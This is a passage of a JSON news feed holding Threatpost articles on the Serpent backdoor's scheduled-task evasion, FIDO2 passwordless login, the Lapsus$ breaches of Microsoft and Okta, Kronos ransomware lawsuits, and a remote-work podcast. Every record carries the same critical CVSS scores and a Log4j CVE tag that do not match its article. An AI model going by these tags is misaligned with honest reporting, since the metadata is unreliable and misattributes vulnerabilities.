outputs via the \u201canswer\u201d URL and see what the infected host\u2019s response was, researchers observed. Once this entire process is complete, Serpent cycles through it indefinitely, they added.\n\n## **Task-Scheduler Evasion Tactic**\n\nIn addition to using steganographic images and the Chocolatey package installer to hide its nefarious activities, the attack also uses what Proofpoint researchers said is a never-before-seen application of signed binary proxy execution using a Scheduled Tasks executable, as \u201can attempt to bypass detection by defensive measures.\u201d\n\nA command that leverages schtasks.exe to create a one-time task to call a portable executable is contained within a Swiper image called ship.jpg after the end of file marker, researchers said.\n\n\u201cIn this case the executable is called calc.exe,\u201d researchers wrote in the post. The trigger for this task is contingent on the creation of a Windows event with EventID of 777, after which the command then creates a dummy event to trigger the task ,and deletes the task from the task scheduler as if it never occurred, they said.\n\n\u201cThis peculiar application of tasking logic results in the portable executable being executed as a child process of taskhostsw.exe, which is a signed Windows binary,\u201d researchers said.\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-22T14:21:42", "type": "threatpost", "title": "Serpent Backdoor Slithers into Orgs Using Chocolatey Installer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-22T14:21:42", "id": "THREATPOST:16624FA0DF55AAB9FDB3C14AC91EC9F5", "href": "https://threatpost.com/serpent-backdoor-chocolatey-installer/179027/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-22T15:44:45", "description": "We all hate passwords, but none of us want to make logging into our accounts a hassle with extra time, steps and devices. That\u2019s why the Fast Identity Online Alliance (FIDO) published a white paper ([PDF](<https://media.fidoalliance.org/wp-content/uploads/2022/03/How-FIDO-Addresses-a-Full-Range-of-Use-Cases.pdf>)) on Thursday, outlining different use cases for the adoption of their FIDO2 set of specifications.\n\nAt the heart of the matter: proposed WebAuthn changes that will smooth the traditional security-versus-usability trade-off that users face when considering FIDO. While FIDO can deliver better security, users have hoops to jump through, FIDO said, including the need to adopt a security key \u2013 for example, the fobs sold by Yubico \u2013 as an authentication device.\n\nUnfortunately, if you avoid the ruffling of users\u2019 feathers, you keep them in a tepid state of security, according to the paper: \u201cMany relying parties keep their users in a password-only mode, or at best, offer phishable second factors,\u201d according to FIDO.\n\nIt\u2019s proposing the following changes to WebAuthn \u2013 the API that makes it easy for web services and other authentication-requesting entities to integrate strong authentication on security keys or on built-in platform authenticators such as biometric readers \u2013 to improve on the situation:\n\n 1. Turning the user\u2019s existing smartphone into a roaming authenticator, and\n 2. Providing better support for authenticator implementations (in particular platform authenticators) that sync FIDO credentials between the user\u2019s devices.\n\n\u201cThis makes FIDO the first authentication technology that can match the ubiquity of passwords, without the inherent risks and phishability,\u201d the paper asserted.\n\n## FIDO History\n\nFIDO, alongside the World Wide Web Consortium (W3C), created FIDO2 to be \u201cthe industry\u2019s answer to the global password problem,\u201d according to its [marketing](<https://fidoalliance.org/fido2/>), addressing \u201call of the issues of traditional authentication.\u201d These specifications \u2013 10 years in the making \u2013 threaten to replace traditional passwords entirely. Yet they \u201chaven\u2019t attained large-scale adoption of FIDO-based authentication in the consumer space,\u201d the paper admitted.\n\nNow is the time for individuals and enterprises to take the proactive step of implementing strong authentication. So will they?\n\nAnd, really, should they? Not everybody thinks so.\n\n## What is FIDO2?\n\nPasswords are the single most tenuous beam propping up our security online. A [tiny minority](<https://threatpost.com/study-only-4-corporate-it-users-stick-password-rules-101509/72326/>) of people follow authentication best practices. Most of us use [bad passwords](<https://threatpost.com/weak-easy-to-remember-passwords-a-familiar-crutch-for-users/100663/>), and then reuse them over and over, [even though we know we shouldn\u2019t](<https://threatpost.com/threatlist-people-know-reusing-passwords-is-dumb-but-still-do-it/155996/>). Then we continue reusing those passwords [even after they\u2019ve been leaked to cybercriminals](<https://threatpost.com/breached-passwords-still-in-use-by-hundreds-of-thousands/147434/>).\n\nSuch was the impetus for the formation of the FIDO alliance. Nearly a decade ago, FIDO [made it its mission](<https://threatpost.com/darpa-fido-alliance-join-race-replace-passwords-021213/77518/>) to fight stale, plaintext passwords and create a new, interoperable system of authentication technologies. Since then, the FIDO Alliance has been interested in establishing a standard of interoperable authentication schemes. They could absorb new authentication technologies into a single infrastructure where they can work in concert with existing technologies like USB tokens, one-time passwords and near-field communications (NFC), among others, the thinking went.\n\nThe world\u2019s biggest technology, finance and security companies \u2013 Apple, Meta, Google, PayPal, Wells Fargo, RSA, and on and on \u2013 count themselves among the [alliance](<https://fidoalliance.org/members/>). Many of these companies have implemented \u2013 or even contributed to \u2013 improved authentication security in recent years. Multi-factor authentication (MFA), in particular, has become more common and more robust since the early days of FIDO, when cyberattackers could [nab](<https://threatpost.com/password-cracking-crew-cracks-11m-ashley-madison-passwords/114625/>) [people\u2019s](<https://threatpost.com/easy-passwords-found-rockyou-data-leak-012110/73409/>) [passwords](<https://threatpost.com/gawker-roadkill-how-find-out-and-recover-121310/74769/>) as easily as they could get at phone numbers in the phonebook.\n\nBut \u201cwhile traditional multi-factor authentication (MFA) solutions like SMS one-time codes add another layer of security,\u201d wrote FIDO representatives in 2019, \u201cthey are still vulnerable to phishing attacks, aren\u2019t simple to use and suffer from low opt-in rates.\u201d Hackers can even [bypass the 2FA process entirely](<https://threatpost.com/2fa-broken-authentication/140776/>).\n\nFIDO2 combines [WebAuthn](<https://www.w3.org/TR/2019/REC-webauthn-1-20190304/>) \u2013 in the [words](<https://www.w3.org/TR/2019/REC-webauthn-1-20190304/>) of its creators, W3C, \u201can API enabling the creation and use of strong, attested, scoped, public key-based credentials by web applications\u201d \u2013 and FIDO\u2019s client to authenticator protocol ([CTAP](<https://fidoalliance.org/specifications/download/>)), which \u201cenables external devices such as mobile handsets or FIDO security keys to work with browsers supporting WebAuthn, and also to serve as authenticators to desktop applications and web services.\u201d\n\n## Phish-Proofing Authentication\n\nPast all the [technical detail](<https://fidoalliance.org/specifications/download/>), the bottom line is this: By downloading FIDO2 specs, \u201cusers log in with convenient methods such as fingerprint readers, cameras, FIDO security keys, or their personal mobile device,\u201d in a way that \u201celiminates the risks of phishing, all forms of password theft and replay attacks.\u201d That, according to a FIDO [press release](<https://www.w3.org/2019/03/pressrelease-webauthn-rec.html.en>) from 2019.\n\nThe system uses your mobile devices to reduce login theft because, wrote FIDO, \u201ccryptographic login credentials are unique across every website, biometrics or other secrets like passwords never leave the user\u2019s device and are never stored on a server.\u201d And \u201cbecause FIDO keys are unique for each Internet site, they cannot be used to track you across sites.\u201d\n\nEnhanced security, via a device you already have in your pocket, or on your desk. Is this the future?\n\n## Will the Password Finally Die?\n\nExperts across the cybersecurity industry \u2013 not to mention, ordinary people everywhere \u2013 have called for the end of traditional passwords. \u201cMoving to a passwordless experience is an absolute necessity to restore trust and improve security and ease of use,\u201d Jerome Becquart, COO of Axiad, explained to Threatpost via email. \u201cWe need a pragmatic approach to passwordless, leveraging both FIDO and PKI,\u201d \u2013 [public key infrastructure](<https://en.wikipedia.org/wiki/Public_key_infrastructure>) \u2013 \u201cin order to address as many use cases as possible, today.\u201d\n\n\u201cMobile phones are the perfect platform to become the all-in-one passwordless authenticator,\u201d he continued, \u201chowever they are not going to be the right answer for every use case. For higher trust requirements, such as privilege accounts, a dedicated, hardware authenticator will still be needed. Additionally there are a number of mobile restricted environments, such as data centers, help desks, manufacturing floors, clean rooms, etc.. that may not allow mobile phones to be used. The pragmatic approach is to offer end users multiple authentication form factors, phone, platform bound or dedicated authenticators in order to address this variety of use cases and environments.\u201d\n\nWith newer, stronger methods of authentication, the issue becomes not the technology but its adoption.\n\nHence Thursday\u2019s white paper, which dove into the problem of usability. FIDO concluded its document by claiming that they\u2019ve developed \u201cthe first authentication technology that can match the ubiquity of passwords, without the inherent risks and phishability,\u201d but Becquart believes that \u201cwe are still going to be faced for the foreseeable future with legacy systems and applications that cannot be changed and modified and will still rely on passwords. The only choice for these legacy apps is to use some kind of password vault or SSO products, protected by a FIDO2 credential.\u201d\n\n## How soon can we make the upgrade?\n\nNot all experts agree that we must. \u201cUltimately this is an approach for people with means,\u201d John Bambenek, principal threat hunter at Netenrich, wrote of FIDO2 in an email to Threatpost. \u201cMany people lack the resources for FIDO keys or the sophistication to manage new authentication methods with their smartphone.\u201d\n\nPlus, \u201cat a basic level, smartphones can be lost or stolen which means a need for some centralized place to reprovision access. The reality is no technology can be completely trusted.\n\n\u201cPasswords are easy and cheap,\u201d Bambenek concluded, \u201cwhich is why they\u2019ll be around. In the end, people like easy and cheap over complicated and costly.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-22T15:42:39", "type": "threatpost", "title": "FIDO: Here\u2019s Another Knife to Help Murder Passwords", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-22T15:42:39", "id": "THREATPOST:65DB14FD89BCDBD3391ADD70F1377E70", "href": "https://threatpost.com/fido-knife-murder-passwords/179031/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-23T15:55:24", "description": "In a new blog post published last night, Microsoft confirmed that the Lapsus$ extortion group hacked one of its employee\u2019s accounts to get \u201climited access\u201d to project source code repositories.\n\n\u201cNo customer code or data was involved in the observed activities. Our investigation has found a single account had been compromised, granting limited access. Our cybersecurity response teams quickly engaged to remediate the compromised account and prevent further activity,\u201d Microsoft explained in an [advisory](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>) about the Lapsus$ threat actors.\n\nOver the weekend and into this week, the gang has publicly [claimed](<https://threatpost.com/lapsus-data-kidnappers-claim-snatches-from-microsoft-okta/179041/>) to have penetrated Microsoft\u2019s defenses and stolen source code, including code for the company\u2019s Bing search engine, Bing Maps and Cortana voice assistant.\n\n## Compromised Azure DevOps Server\n\nOn Sunday, the actor announced that it had compromised Microsoft\u2019s Azure DevOps server. Lapsus$ [shared](<https://twitter.com/ZeroLogon/status/1505408208059383809?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1505408208059383809%7Ctwgr%5E%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fsecurityaffairs.co%2Fwordpress%2F129344%2Fcyber-crime%2Flapsus-leak-37gb-microsoft-source-code.html>) a screenshot of what were allegedly Microsoft\u2019s internal source code repositories: leaked files that security researchers [said](<https://www.bleepingcomputer.com/news/microsoft/lapsus-hackers-leak-37gb-of-microsofts-alleged-source-code/>) appear to be legitimate internal source code.\n\n> LAPSU$ next victim seem to be [@Microsoft](<https://twitter.com/Microsoft?ref_src=twsrc%5Etfw>) (?)[@SOSIntel](<https://twitter.com/SOSIntel?ref_src=twsrc%5Etfw>) [@LawrenceAbrams](<https://twitter.com/LawrenceAbrams?ref_src=twsrc%5Etfw>) [pic.twitter.com/X5FmgajJcz](<https://t.co/X5FmgajJcz>)\n> \n> \u2014 \ud83e\udd77\ud83c\udffc\ud83d\udcbbTom Malka\ud83d\udcbb\ud83e\udd77\ud83c\udffc (@ZeroLogon) [March 20, 2022](<https://twitter.com/ZeroLogon/status/1505408208059383809?ref_src=twsrc%5Etfw>)\n\nThe threat actor has published more data since then: On Monday night, \u200b\u200bLapsus$ posted a torrent for a 9GB 7zip archive containing the source code of over 250 projects that the gang claimed came from Microsoft. Then, last night, it released 37GB of that Azure DevOps server-derived data, BleepingComputer [reported](<https://www.bleepingcomputer.com/news/microsoft/lapsus-hackers-leak-37gb-of-microsofts-alleged-source-code/>).\n\nSecurity researchers who have pored over the leaked files told BleepingComputer that they appear to be legitimate internal source code from Microsoft; that the leaked projects contain emails and internal engineering documentation for mobile apps; and that the projects look to be for web-based infrastructure, websites, or mobile apps. However, the projects don\u2019t contain source code for Microsoft desktop software such as Windows, Windows Server and Microsoft Office, according to the outlet\u2019s sources.\n\nSecurity Affairs shared a screenshot, shown below, of the uncompressed 7zip archive that contains the 37GB of source code belonging to hundreds of Microsoft projects.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/23104552/Microsoft-data-leak-2-e1648046776282.jpg>)\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/23104557/Microsoft-data-leak-e1648046807438.jpg>)\n\nSource: Security Affairs.\n\nSource code isn\u2019t Medusa. Just looking at it won\u2019t turn anybody into stone. The company \u201cdoes not rely on the secrecy of code as a security measure and viewing source code does not lead to elevation of risk,\u201d Microsoft\u2019s advisory said.\n\n## Lapsus$ TTPs\n\nMicrosoft tracks Lapsus$ as DEV-0537. Its advisory outlines the gang\u2019s tactics, techniques and procedures (TTPs) that it uses to compromise user identities so as to gain initial access to a targeted organization, including:\n\n * Deploying the malicious Redline [password stealer](<https://threatpost.com/various-malware-lurking-in-discord-app-to-target-gamers/163867/>) to obtain passwords and session tokens\n * Purchasing credentials and session tokens from criminal underground forums\n * Paying employees at targeted organizations (or suppliers/business partners) for access to credentials and MFA approval\n * Searching public code repositories for exposed credentials\n\nMicrosoft confirmed that Lapsus$ had used the TTPs in the gang\u2019s attack on Microsoft. \u201cOur team was already investigating the compromised account based on threat intelligence when the actor publicly disclosed their intrusion,\u201d according to its advisory. \u201cThis public disclosure escalated our action allowing our team to intervene and interrupt the actor mid-operation, limiting broader impact.\u201d\n\nWith regards to the third bullet point in that TTP list \u2013 paying rogue employees to help it crack a target\u2019s defenses \u2013 Lapsus$ hasn\u2019t been particularly subtle about its recruitment efforts. The gang [posted](<https://cybersecuritynews.com/beware-lapsus-ransomware-group/>) a notice on its Telegram channel on March 10, telling the world that it was up for recruiting company insiders, including those at Microsoft; other big software/gaming companies such as Apple, IBM or EA; telecoms such as Telefonica, ATT; and more, to help it carry out its dirty work.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/23105813/lapsus-recruitment-ad-e1648047507406.png>)\n\nThe Lapsus$ gang\u2019s recruitment ad for rogue employees. Source: Microsoft.\n\n## How to Stop Lapsus$\n\nMicrosoft\u2019s advisory offered a detailed list of recommendations for organizations to help them avoid going through what it, Okta and a growing list of Lapsus$ victims have suffered.\n\nBelow are some of the company\u2019s top-level suggestions. Its advisory drills down into each:\n\n * Strengthen MFA implementation\n * Require healthy and trusted endpoints\n * Leverage modern authentication options for VPNs\n * Strengthen and monitor your cloud security posture\n * Improve awareness of social engineering attacks\n * Establish operational security processes in response to DEV-0537 intrusions\n\n## Lapsus$ Got at Data for 2.5% of Okta Customers\n\nLapsus$ also breached authentication firm Okta, it claimed: a claim supported by what the actor purported were screenshots of Okta\u2019s Slack channels and the interface for Cloudflare, which is one of thousands of customers that use Okta\u2019s technology to provide authentication for its employees.\n\nIn an [update](<https://www.okta.com/blog/2022/03/updated-okta-statement-on-lapsus/>) published last night, Okta Chief Security Officer David Bradbury confirmed the hit and provided details on the skope, saying that about 2.5 percent of the company\u2019s customers were potentially affected by a January 2022 Lapsus$ intrusion. Hence, those companies\u2019 data \u201cmay have been viewed or acted upon,\u201d he said. As of Tuesday night, Okta had already contacted affected customers by email.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-23T15:28:03", "type": "threatpost", "title": "Microsoft: Lapsus$ Used Employee Account to Steal Source Code", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-23T15:28:03", "id": "THREATPOST:47481707E9A4BF7FC15CC47EC8A8F249", "href": "https://threatpost.com/microsoft-lapsus-compromised-one-employees-account/179048/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Remember when Kronos, the workforce-management workhorse, got [whacked](<https://threatpost.com/kronos-ransomware-outage-payroll-chaos/176984/>) by ransomware in December, right in time to gum up end-of-year HR busywork such as bonuses and vacation tracking?\n\nCould take days to crawl back, Ultimate Kronos Group (UKG) [said](<https://community.kronos.com/s/feed/0D54M00004wJCdJSAW?language=en_US>) at the time. Or, then again, could take up to several weeks, it said in a subsequent [update](<https://community.kronos.com/s/feed/0D54M00004wJKHiSAO?language=en_US>).\n\nIt turns out that dragging its Kronos Private Cloud (KPC) systems back has taken nearly two months. As of Jan. 22, it wasn\u2019t yet done dragging them back, but aggrieved customers had started the process of dragging the company into court as scheduling and payroll was disrupted at [thousands of employers](<https://www.shrm.org/resourcesandtools/hr-topics/technology/pages/ukg-ransomware-disrupts-scheduling-payroll-kronos-private-cloud.aspx>) \u2013 [including hospitals](<https://www.npr.org/2022/01/15/1072846933/kronos-hack-lawsuits>) \u2013 many of which have been forced to log hours manually.\n\nAs NPR reported on Jan. 15, some 8 million people experienced \u201cadministrative chaos\u201d following the attack, including tens of thousands of public transit workers in the New York City metro area, public service workers in Cleveland, employees of FedEx and Whole Foods, and \u201cmedical workers across the country who were already dealing with an omicron surge that has filled hospitals and exacerbated worker shortages.\u201d\n\n020722 18:31 UPDATE: Sportswear manufacturer Puma was one of two UKG customers whose employees\u2019 personally identifying information (PII) \u2013 including their Social Security Numbers (SSNs) \u2013 was stolen by attackers. See below for more details.\n\n020822 10:55 UPDATE: A UKG spokesperson reached out to Threatpost to clarify the that the September Puma breach, which resulted in stolen source code, was unrelated to UKG\u2019s December ransomware attack on Kronos Private Cloud. UKG subsequently discovered that Puma was one of two customers who had employee PII compromised as a result of the ransomware attack. Puma was a Kronos Private Cloud customer, and the affected employees and their dependents are in the process of being notified, he said.\n\n## Furious and Filing Suits\n\nAs far as UKG\u2019s gratitude for customers\u2019 patience goes, it might be a little aspirational.\n\nCustomers were already seething over the company\u2019s lack of communication as the weekend unwound following the Saturday, Dec. 11 discovery of the attack. They [complained](<https://community.kronos.com/s/feed/0D54M00004wJKHiSAO?language=en_US>) [about](<https://community.kronos.com/s/feed/0D54M00004wJCdJSAW?language=en_US>) poor communication, a lack of information about whether their data was still out there somewhere, that the company\u2019s portal and support site had gone AWOL right in the thick of things, and that the \u201cweeks\u201d or \u201cdelays\u201d to restore systems was insupportable.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/03172618/Kronos-customers-fuming-e1643927213846.jpg>)\n\nKronos customers\u2019 complaints. Source: Kronos Community Forum.\n\nThe subsequent lawsuits include a [class action](<https://www.classaction.org/news/new-york-mta-employees-owed-unpaid-overtime-following-kronos-data-breach-lawsuit-alleges>) filed by New York transit workers claiming that the Metropolitan Transportation Authority has \u201cfailed to pay certain employees any overtime wages since their payroll administrator was crippled by a December 2021 data breach.\u201d\n\nWorkers at Tesla and PepsiCo have also brought separate [lawsuits](<https://searchhrsoftware.techtarget.com/news/252512253/Tesla-PepsiCo-workers-bring-lawsuit-over-UKG-payroll-outage#:~:text=Lawsuits%20over%20the%20ransomware%20attack,inaccurate%20pay%20during%20the%20outage.&text=Two%20workers%2C%20one%20at%20Telsa%20Inc.&text=subsidiary%2C%20are%20suing%20the%20Ultimate,short%20of%20what%20they%20earned.>) over the UKG payroll outage, claiming that they received inaccurate pay during the outage.\n\nAs well, at the end of December, West Virginia\u2019s state auditor, J.B. McCuskey [promised](<https://wvmetronews.com/2021/12/31/mccuskey-promises-lawsuit-against-state-contractor-if-damages-for-payroll-problems-are-left-unpaid/>) that \u201cwe\u2019re going to hold Kronos accountable\u201d for what he called the \u201creal pain in the rear end\u201d of having to manually input information for more than 37,000 state employees before they got their first paychecks of 2022.\n\n020722 17:54 UPDATE: UKG didn\u2019t respond to Threatpost\u2019s inquiries regarding when it expects all of its systems to be fully restored. On Thursday evening, a company spokesperson pointed Threatpost to an [FAQ](<https://www.ukg.com/KPCupdates/kpc-faq>) that states that the company is working with Mandiant and West Monroe \u201cto test and continually harden our environment.\u201d\n\nThe company has identified \u201ca relatively small volume of data that was exfiltrated\u201d \u2013 data that included the personal details of two customers\u2019 employees. Both affected customers have been notified, it said.\n\nIn September, The Record [reported](<https://therecord.media/hackers-stole-puma-source-code-no-customer-data-company-says/>) that one of those customers was Puma, the sportswear manufacturer. The attackers stole source code, according to The Record. As of late August, they were trying to extort the company into paying ransom for it, threatening to release the files on a leak site if the German company didn\u2019t pay up.\n\n020822 10:44 UPDATE: The two incidents \u2013 Puma\u2019s September breach and the attack on UKG, which provides services to Puma \u2013 are unrelated, contrary to what Threatpost erroneously reported in an earlier update.\n\nAs [BleepingComputer](<https://www.bleepingcomputer.com/news/security/puma-hit-by-data-breach-after-kronos-ransomware-attack/>) reported on Monday after having dug up breach notification letters filed with several attorney generals\u2019 offices, the [breach notification](<https://apps.web.maine.gov/online/aeviewer/ME/40/10394643-6f4e-49ff-884a-9977602932a9.shtml>) UKG filed with the Office of the Maine Attorney General indicated that personal information belonging to Puma employees and their dependents was involved in the breach.\n\nPuma was one of two customers who had employee PII compromised as a result of that incident. Puma was a Kronos Private Cloud customer, and affected employees are in the process of being notified \u2013 hence the filing with the Maine AG\u2019s office.\n\nThat same letter said that data belonging to a total of 6,632 individuals were affected in the UKG breach, including SSNs.\n\n## Customers No Longer Using Pen and Paper\n\nUKG\u2019s core services were restored as of Jan. 22. That leaves \u201ccertain supplementary customer applications\u201d still to be restored. But at this point, customers are no longer using pen and paper for payroll, employee scheduling and other critical functions.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-03T23:08:49", "type": "threatpost", "title": "Kronos Still Dragging Itself Back From Ransomware Hell", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-03T23:08:49", "id": "THREATPOST:5C1E777F8F9FC173EF97E95D8AFAA5F2", "href": "https://threatpost.com/kronos-dragging-itself-back-ransomware-hell/178213/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-03T14:20:55", "description": "The baby upchucks. The dog loudly informs you that she\u2019s detected a budding squirrel armageddon. Your department\u2019s Zoom meeting starts in four minutes. The Bank of Fezziwig texts: If you haven\u2019t enabled online banking, click here.\n\nWhat. Do. You. DO?!?\n\nIt doesn\u2019t matter that you\u2019ve been working remotely since circa P.P. \u2013 that\u2019s Pre-Pandemic times. Now, your spouse is underfoot, your kids are bouncing off the walls of your quote-unquote office, you haven\u2019t had coffee, and you\u2019re pretty sure you don\u2019t even have an account at B of F, so you better just click that link and get the thing off your phone and out of your face.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nWrong answer! You\u2019ve been [smished](<https://threatpost.com/smishing-text-phishing-ciso-radar/165634/>) by an attacker who sent a malicious link via SMS.\n\nTwo years into the pandemic, remote work has become common, but securing data is just as tough as it\u2019s always been. You don\u2019t have to look far to see tales of human error leading to cyber malfeasance: The human factor is at the base of most cyberattacks, from the employees who [fall for](<https://threatpost.com/bec-losses-top-18b/167148/>) business email compromise (BEC) attacks to whoever forgot to shut down that no-longer-used [VPN account](<https://threatpost.com/darkside-pwned-colonial-with-old-vpn-password/166743/>) that attackers used to launch the calamitous [Colonial Pipeline](<https://threatpost.com/colonial-pays-5m/166147/>) ransomware attack.\n\nMark Loveless is a staff security researcher at GitLab, maker of the web-based Git repository. He\u2019s an expert at securing data when you\u2019ve got a remote, oftentimes frantically distracted workforce. After all, as GitLab [puts it](<https://about.gitlab.com/company/culture/all-remote/guide/>), it\u2019s \u201cone of the world\u2019s largest all-remote companies,\u201d with over 1,500 team members located in more than 65 countries around the world.\n\nMark visited the Threatpost podcast to give us an update on the world of remote work and to answer this question: Where are we now with data protection?\n\nCaution: If you\u2019re playing a drinking game based on how many times he\u2019ll say \u201c[Zero Trust](<https://threatpost.com/practical-guide-zero-trust-security/151912/>),\u201d stock the liquor cabinet before listening. Mark also cautioned that the dog might see a squirrel during our interview. It happens.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/022522_Mark_Loveless_GitLab_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T14:00:53", "type": "threatpost", "title": "Securing Data With a Frenzied Remote 